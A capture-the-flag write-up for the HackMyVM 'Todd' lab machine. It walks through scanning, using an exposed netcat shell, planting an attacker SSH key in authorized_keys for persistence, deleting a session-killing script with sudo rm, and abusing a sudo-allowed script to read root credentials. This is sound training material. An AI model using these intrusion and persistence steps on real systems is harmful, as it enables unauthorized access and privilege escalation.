Synix's Gitbook
  • 👤ABOUT ME
    • About Me
  • 🛡️Red Teaming
    • Three Techniques for Bypassing EDR
  • Malware Dev
    • [SANS HackFest 2022] Developing High-Impact Malware with Minimal Effort
  • 📖Writeups
    • HackMyVM
      • Easy 🟢
        • Superhuman
        • Uvalde
        • Nebula
        • Todd
Powered by GitBook
On this page
  • Enumeration
  • Now back to the port
  • Exploitation
  • Stable Shell
  • Privilege Escalation
  1. Writeups
  2. HackMyVM
  3. Easy 🟢

Todd

Writeup HackMyVM

PreviousNebula

Last updated 28 days ago

Yeah, aftter long time i'm back guys!! Hope y'all doing great! Todd is an easy difficulty Linux machine from HackMyVM platfrom!

Enumeration

>> Find the IP address of our Target in our virtual network, with netdiscover

 Currently scanning: 192.168.6.0/16   |   Screen View: Unique Hosts
 
 7 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 420                                                                                       
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 ------------------------------------------------------------------------------------------------------------                                                                                                                       
 192.168.1.9     28:a0:6b:44:be:d4      1      60  Intel Corporate                                                                                                                                               
 192.168.1.15    08:00:27:88:e5:7f      1      60  PCS Systemtechnik GmbH

  • Our target ip is 192.168.1.15 .

>> Let's do begin with nmap scan

┌──(synix㉿0day)-[~]
└─$ sudo nmap -sC -sV -p- 192.168.1.15      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-26 12:24 IST
Nmap scan report for 192.168.1.15 (192.168.1.15)
Host is up (0.00012s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
80/tcp    open  http       Apache httpd 2.4.59 ((Debian))
|_http-title: Mindful Listening
|_http-server-header: Apache/2.4.59 (Debian)
1827/tcp  open  tcpwrapped
6192/tcp  open  tcpwrapped
7066/tcp  open  unknown
11379/tcp open  tcpwrapped
15758/tcp open  tcpwrapped
15924/tcp open  tcpwrapped
16778/tcp open  tcpwrapped
17828/tcp open  tcpwrapped
24072/tcp open  tcpwrapped
28343/tcp open  tcpwrapped
28976/tcp open  tcpwrapped
MAC Address: 08:00:27:88:E5:7F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.15 seconds

7066 Port looks Intresting!!

Let's Visit the Webpage.

Just an static site!

>> Brute Force files and subdirectories with gobuster

┌──(synix㉿0day)-[~]
└─$ gobuster dir -u http://192.168.1.15 -w /home/synix/Downloads/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.15
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/synix/Downloads/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/tools                (Status: 301) [Size: 312] [--> http://192.168.1.15/tools/]
/server-status        (Status: 403) [Size: 277]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

lets visit the http://192.168.1.15/tools/

Found some tools on the /tools 

Index of /tools
[ICO]	        Name	    Last modified	Size	Description
[PARENTDIR]	            Parent Directory	 	- 	 
[ ]	        fscan	    2024-02-25 03:32 	6.0M	 
[TXT]	        les.sh	    2023-11-25 02:00 	89K	 
[TXT]	        linpeas.sh  2023-04-17 07:54 	324K	 
[ ]	        pspy64	    2023-04-17 07:58 	3.0M
	 
Apache/2.4.59 (Debian) Server at 192.168.1.15 Port 80

Maybe we could use this tool

  • fscan: vulnerability scanner

  • les.sh: Linux privilege escalation auditing tool

  • linpeas.sh: Linux Privilege Escalation Awesome Script

  • pspy64: Monitor linux processes without root permissions

Now back to the port

Let's try to connecting with netcat

┌──(synix㉿0day)-[~]
└─$ sudo nc 192.168.1.15 7066         
[sudo] password for synix: 
whoami
todd
id
uid=1000(todd) gid=1000(todd) groups=1000(todd)

But after some time it will automatically disconnects.

Exploitation

Let's look around what we can find!

┌──(synix㉿0day)-[~/Downloads]
└─$ sudo nc 192.168.1.15 7066
cd /home/todd
dir
user.txt
cat user.txt
[*REDACTED*]

Yay! we got the user flag!

Stable Shell

We need to get a stable shell, so here we can use SSH key.

On victim machine :

cd /home/todd 
mkdir .ssh

Now, on our attacker machine, generate an SSH key:

┌──(synix㉿0day)-[~]
└─$ ssh-keygen -t rsa -f attacker
Generating public/private rsa key pair.
Enter passphrase for "attacker" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in attacker
Your public key has been saved in attacker.pub
The key fingerprint is:
SHA256:Q7MjEkEjYWNShlenGJDqt6nSAJSq/SAhQPvbEHJHOm8 synix@0day
The key's randomart image is:
+---[RSA 3072]----+
|+*@+=..          |
|+Bo=o=           |
|=+.=o.  o        |
|* + =. . o       |
|=o o.E. S        |
|+.o.=. . o       |
| +.+o.           |
|. .o.            |
|...              |
+----[SHA256]-----+

Now add the contents of attacker.pub to authorized_keys on victim machine :

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkhsv9...hdsU64FEc= synix@0day" > .ssh/authorized_keys

Now Log In :

┌──(synix㉿0day)-[~]
└─$ ssh todd@192.168.1.15 -i attacker
Enter passphrase for key 'attacker': 
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
todd
$ id
uid=1000(todd) gid=1000(todd) groups=1000(todd)

And we're in!

Privilege Escalation

Le's Look around 

Connection to 192.168.1.15 closed by remote host.

SSH session randomly closed.

Let's Look for permissions.

$ sudo -l
Matching Defaults entries for todd on todd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User todd may run the following commands on todd:
    (ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
    (ALL : ALL) NOPASSWD: /usr/bin/rm
    (ALL : ALL) NOPASSWD: /usr/sbin/reboot
$ bash
todd@todd: cd /opt
todd@todd:/opt$ ls
create_nc2.sh  create_nc.sh  fake_ssh  kill_todd.sh
todd@todd:~$ Connection to 192.168.1.15 closed by remote host.
Connection to 192.168.1.15 closed.

We again disconnected from the session! this because of the kill_todd.sh . So Let's remove it.

todd@todd:/opt$ cat kill_todd.sh 
cat: kill_todd.sh: Permission denied
todd@todd:/opt$ sudo /usr/bin/rm kill_todd.sh
todd@todd:/opt$ ls
create_nc2.sh  create_nc.sh  fake_ssh
todd@todd:/opt$

Now let's look at the script /guess_and_check.sh 

# check this script used by human 
a=$((RANDOM%1000))
echo "Please Input [$a]"

echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number

[[ $input_number -ne "$a" ]] && exit 1

sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"

[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2

Scipt Logic :

  • Picks a random number between 0 and 999, stores in variable a and waits for user input.

  • If it's doesn't matches then it exits.

  • Then it creates two file paths in /tmp/, one as true_file and one as false_file.

  • If true_file exists, and false_file does NOT, it prints /root/.cred.

Because the filenames are generated using random numbers between 0 and 999, So we will manually create the file in /tmp folder. So this will get the true_file . 

for i in {1..250}; do touch "$i"; done

Now run the scirpt with sudo

todd@todd:~$ /bin/bash /srv/guess_and_check.sh 
Please Input [904]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>904
todd@todd:~$
todd@todd:~$ /bin/bash /srv/guess_and_check.sh
Please Input [465]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>468
todd@todd:~$
todd@todd:~$ /bin/bash /srv/guess_and_check.sh
Please Input [389]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>389
fake password

We've got the root creds!!

Let's switch to root.

todd@todd:~$ su root
Password: 
root@todd:/home/todd# whoami
root
root@todd:/home/todd# id
uid=0(root) gid=0(root) groups=0(root)
root@todd:/home/todd# cd /root/
root@todd:~# ls
root.txt
root@todd:~# cat root.txt 
Todd{*REDACTED*}
root@todd:~#

And Finally We have the ROOT Flag!! 🚨

📖
VM Link
Todd
FireFox
https://hackmyvm.eu/achievement/?achievement=31188